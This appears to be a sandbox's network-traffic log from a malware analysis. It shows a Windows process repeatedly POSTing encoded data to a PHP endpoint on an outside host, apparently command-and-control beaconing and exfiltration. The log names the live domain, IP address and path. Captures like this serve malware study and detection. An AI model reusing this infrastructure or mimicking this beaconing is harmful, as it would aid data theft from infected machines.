                                        Nov 5, 2024 08:12:18.700934887 CET | 286 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 384
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:18.932244062 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:19.244911909 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Nov 5, 2024 08:12:19.267184019 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:19.498859882 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:19.803580999 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        1 | 192.168.2.7 | 49751 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:19.015861988 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:19.859914064 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:19.934771061 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:17 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        2 | 192.168.2.7 | 49761 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:20.057135105 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:20.859441996 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:20.931188107 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:18 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        3 | 192.168.2.7 | 49767 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:21.062974930 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:21.874322891 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:21.954360962 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:19 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        4 | 192.168.2.7 | 49774 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:22.087076902 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:22.931031942 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:23.014599085 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        5 | 192.168.2.7 | 49780 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:23.202200890 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:24.012356043 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:24.085799932 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        6 | 192.168.2.7 | 49786 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:24.214518070 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        7 | 192.168.2.7 | 49787 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:24.824687004 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:25.634918928 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:25.715007067 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        8 | 192.168.2.7 | 49793 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:24.958798885 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:25.783565998 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:25.861704111 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:23 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        9 | 192.168.2.7 | 49798 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:25.990725994 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1028
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:26.349411964 CET | 1028 | OUT | Data Raw: 5b 59 43 5c 59 55 5a 53 5e 5e 54 55 56 5a 5a 5e 5f 5a 59 58 52 5c 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YC\YUZS^^TUVZZ^_ZYXR\RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'13'==Y%";[) 3/[>=0&X&=X$;(+:&G!']*
                                        Nov 5, 2024 08:12:26.813638926 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:26.895900965 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:24 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        10 | 192.168.2.7 | 49804 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:27.029160023 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:27.380755901 CET | 1032 | OUT | Data Raw: 5e 5f 43 5f 5c 58 5a 5c 5e 5e 54 55 56 5e 5a 51 5f 55 59 5a 52 5b 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^_C_\XZ\^^TUV^ZQ_UYZR[RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.B'<3!$1';$Z)_0=>2$&\$Y'^+[=:&G!']*7
                                        Nov 5, 2024 08:12:27.839596033 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:27.922909021 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:25 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        11 | 192.168.2.7 | 49810 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:28.062614918 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:28.412012100 CET | 1032 | OUT | Data Raw: 5e 5f 46 5f 5c 5d 5f 51 5e 5e 54 55 56 5b 5a 51 5f 53 59 5f 52 50 52 5e 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^_F_\]_Q^^TUV[ZQ_SY_RPR^YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$",_')'<^;;<)<X3?#_*>Q0*Y'438X>*&G!']*#
                                        Nov 5, 2024 08:12:28.874825954 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:28.948395014 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:26 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        12 | 192.168.2.7 | 49816 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:29.072567940 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:29.427622080 CET | 1032 | OUT | Data Raw: 5e 5e 46 59 59 5d 5f 50 5e 5e 54 55 56 5f 5a 51 5f 56 59 59 52 58 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^FYY]_P^^TUV_ZQ_VYYRXRZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.0"Z%=&'2 ^/+;>0^$?'X>=&Q'<' 38$**&G!']*3
                                        Nov 5, 2024 08:12:29.889707088 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:29.962491035 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:27 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        13 | 192.168.2.7 | 49822 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:30.088845015 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:30.443218946 CET | 1032 | OUT | Data Raw: 5e 5a 43 58 59 55 5a 51 5e 5e 54 55 56 5e 5a 5d 5f 5a 59 5c 52 5f 52 5d 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^ZCXYUZQ^^TUV^Z]_ZY\R_R]YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.02<Y'X0!?;8;)'', ==-05$[?%; >:&G!']*7


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        14 | 192.168.2.7 | 49828 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:30.762367010 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:31.115092039 CET | 1300 | OUT | Data Raw: 5e 5e 43 5a 5c 58 5f 52 5e 5e 54 55 56 58 5a 5f 5f 53 59 5f 52 5f 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^CZ\X_R^^TUVXZ__SY_R_RQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'(3%\$28[,]0Y*%8X$?4==-'6Y$'^'#>*&G!']*/
                                        Nov 5, 2024 08:12:31.573353052 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:31.665611029 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:29 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 3a 06 24 16 3c 51 23 14 22 1f 2b 2e 28 5a 22 19 2f 5d 38 3d 34 5d 24 0d 01 0a 29 01 0f 08 23 3a 35 01 23 2d 34 5f 23 2e 2b 1e 3d 1b 2f 5a 07 10 26 03 32 32 05 54 26 07 33 07 33 33 38 04 3d 3c 15 00 22 05 0d 5b 32 3b 18 01 26 2a 05 57 2c 3a 22 0c 2d 38 23 5a 2e 0f 34 5e 32 0e 2c 54 0d 10 39 57 3d 21 23 0c 3d 02 17 5d 26 19 34 1d 34 3e 23 12 3d 3a 2c 52 3f 2d 2d 04 24 33 24 1b 21 54 26 0c 32 15 05 02 24 1f 02 52 26 18 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: :$<Q#"+.(Z"/]8=4]$)#:5#-4_#.+=/Z&22T&3338=<"[2;&*W,:"-8#Z.4^2,T9W=!#=]&44>#=:,R?--$3$!T&2$R&%U,.V0WQ


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        15 | 192.168.2.7 | 49829 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:31.057131052 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:31.411921978 CET | 1032 | OUT | Data Raw: 5b 5d 46 5d 5c 5a 5a 57 5e 5e 54 55 56 5c 5a 5f 5f 51 59 58 52 5b 52 5b 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []F]\ZZW^^TUV\Z__QYXR[R[YR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$T [3>-_3\/80X=<_$?X>[6T'<$>7_$ =&G!']*?
                                        Nov 5, 2024 08:12:31.868746996 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:31.940855980 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:29 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        16 | 192.168.2.7 | 49835 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:32.073221922 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:12:32.427608013 CET | 1032 | OUT | Data Raw: 5e 5e 43 59 59 5f 5f 56 5e 5e 54 55 56 5c 5a 5d 5f 52 59 51 52 58 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^CYY__V^^TUV\Z]_RYQRXRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-3<'=-'#,_>5$_$<+X(-%,X$;'+;Y):&G!']*?
                                        Nov 5, 2024 08:12:32.874933004 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:32.948268890 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:30 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        17 | 192.168.2.7 | 49841 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:33.069449902 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:12:33.427602053 CET | 1032 | OUT | Data Raw: 5e 59 43 53 59 59 5a 56 5e 5e 54 55 56 5e 5a 5f 5f 50 59 58 52 5f 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YCSYYZV^^TUV^Z__PYXR_RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'!'0>:'2$_-+>;3 (.2U$,'[?^$+;\*:&G!']*7
                                        Nov 5, 2024 08:12:33.900881052 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:12:33.982325077 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:12:31 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        18 | 192.168.2.7 | 49850 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:12:34.099775076 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
